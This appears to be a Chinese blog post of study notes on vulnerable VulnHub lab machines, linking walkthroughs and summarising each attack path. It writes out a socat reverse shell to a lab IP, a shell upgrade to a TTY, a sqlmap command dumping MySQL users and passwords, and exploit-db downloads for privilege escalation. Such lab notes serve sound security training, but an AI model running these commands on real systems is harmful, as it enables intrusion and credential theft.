靶场测试系列(已办清单)

在线靶场

https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps

总清单

http://www.hackingarticles.in/capture-flag-challenges/

Hackademic: RTB1

地址

https://www.vulnhub.com/entry/hackademic-rtb1,17/

wp

http://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/

重点

sql 注入获取 wordpress 管理员密码,然后后台上传拿 shell.

使用

python -c 'import pty; pty.spawn("/bin/bash")'

shell 转成 tty shell 用于提权

然后用

https://www.exploit-db.com/download/40839

提权

转 交互式 shell 的另一种方式

攻击者的机器,监听

socat file:`tty`,raw,echo=0 tcp-listen:4444

被攻击的机器端执行,反弹 shell

./socat_i386_static exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.128:4444

参考

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://github.com/static-linux/static-binaries-i386/blob/master/socat-2.0.0-b8.tar.gz
https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

De-ICE

地址

https://www.vulnhub.com/entry/de-ice-s1120,10/

wp

http://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/

重点

sql 注入获取 数据库用户名和密码

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

用获取到的用户名和密码尝试登陆 ssh

然后用 linux-exploit-suggesterexp ,最后用

https://www.exploit-db.com/download/40839

拿到 root

一定按流程走,先搜集漏洞信息,后面综合考虑利用。

pWnOS-2.0

地址

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

wp

http://www.hackingarticles.in/hack-the-pwnos-2-0-boot-2-root-challenge/

重点

  • 利用 开源系统的漏洞,生成用户名
  • 登陆后文件上传漏洞 getshell
  • exp 提权

PwnLab: init

地址

https://www.vulnhub.com/entry/pwnlab-init,158/

wp

http://www.hackingarticles.in/penetration-testing-pwnlab-ctf-challenge/

重点

  • 文件包含( 限制了文件结尾 ) + php 流 获取 php 文件内容
  • 登陆后上传图片,然后利用包含获取 shell
  • 使用 exp 提权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值